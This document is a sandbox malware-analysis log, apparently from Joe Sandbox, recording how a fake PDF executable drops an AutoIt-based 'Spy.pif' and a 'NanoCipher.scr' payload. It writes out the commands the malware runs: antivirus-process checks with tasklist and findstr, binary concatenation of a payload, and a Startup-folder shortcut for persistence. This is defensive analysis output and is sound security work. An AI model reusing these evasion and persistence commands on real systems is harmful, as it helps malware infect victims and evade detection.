Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE42D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00AE42D5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AD8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00AD8F2E
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00AE5778
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00765778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00765778
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeFile created: C:\Windows\GccIncludedJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A8B02011_2_00A8B020
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A894E011_2_00A894E0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A89C8011_2_00A89C80
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA23F511_2_00AA23F5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00B0840011_2_00B08400
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB650211_2_00AB6502
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A8E6F011_2_00A8E6F0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB265E11_2_00AB265E
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA282A11_2_00AA282A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB89BF11_2_00AB89BF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00B00A3A11_2_00B00A3A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB6A7411_2_00AB6A74
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A90BE011_2_00A90BE0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00ADEDB211_2_00ADEDB2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AACD5111_2_00AACD51
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00B00EB711_2_00B00EB7
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE8E4411_2_00AE8E44
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB6FE611_2_00AB6FE6
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA33B711_2_00AA33B7
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AAF40911_2_00AAF409
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A9D45D11_2_00A9D45D
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A8F6A011_2_00A8F6A0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA16B411_2_00AA16B4
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A9F62811_2_00A9F628
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A8166311_2_00A81663
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA78C311_2_00AA78C3
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA1BA811_2_00AA1BA8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AADBA511_2_00AADBA5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AB9CE511_2_00AB9CE5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00A9DD2811_2_00A9DD28
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AA1FC011_2_00AA1FC0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AABFD611_2_00AABFD6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0070B02017_2_0070B020
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007094E017_2_007094E0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00709C8017_2_00709C80
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007223F517_2_007223F5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0078840017_2_00788400
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0073650217_2_00736502
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0073265E17_2_0073265E
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0070E6F017_2_0070E6F0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072282A17_2_0072282A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007389BF17_2_007389BF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00736A7417_2_00736A74
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00780A3A17_2_00780A3A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00710BE017_2_00710BE0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072CD5117_2_0072CD51
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0075EDB217_2_0075EDB2
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00768E4417_2_00768E44
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00780EB717_2_00780EB7
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00736FE617_2_00736FE6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007233B717_2_007233B7
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0071D45D17_2_0071D45D
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072F40917_2_0072F409
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0070166317_2_00701663
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0071F62817_2_0071F628
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007216B417_2_007216B4
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0070F6A017_2_0070F6A0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_007278C317_2_007278C3
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072DBA517_2_0072DBA5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00721BA817_2_00721BA8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00739CE517_2_00739CE5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0071DD2817_2_0071DD28
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0072BFD617_2_0072BFD6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00721FC017_2_00721FC0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\185027\Spy.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: String function: 00728B30 appears 42 times
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: String function: 00711A36 appears 34 times
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: String function: 00720D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: String function: 00A91A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: String function: 00AA0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: String function: 00AA8B30 appears 42 times
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: String function: 004062A3 appears 57 times
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs scan_doc_zapit_836893.pdf.exe
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000002.2163034210.0000000000722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs scan_doc_zapit_836893.pdf.exe
Source: scan_doc_zapit_836893.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal92.expl.evad.winEXE@28/17@2/0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEA6AD GetLastError,FormatMessageW,11_2_00AEA6AD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AD8DE9 AdjustTokenPrivileges,CloseHandle,11_2_00AD8DE9
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00AD9399
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00758DE9 AdjustTokenPrivileges,CloseHandle,17_2_00758DE9
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00759399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00759399
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00AE4148
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00AE443D
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifFile created: C:\Users\user\AppData\Local\NanoSec CryptographicsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsn992B.tmpJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: scan_doc_zapit_836893.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeFile read: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint HJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif HJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
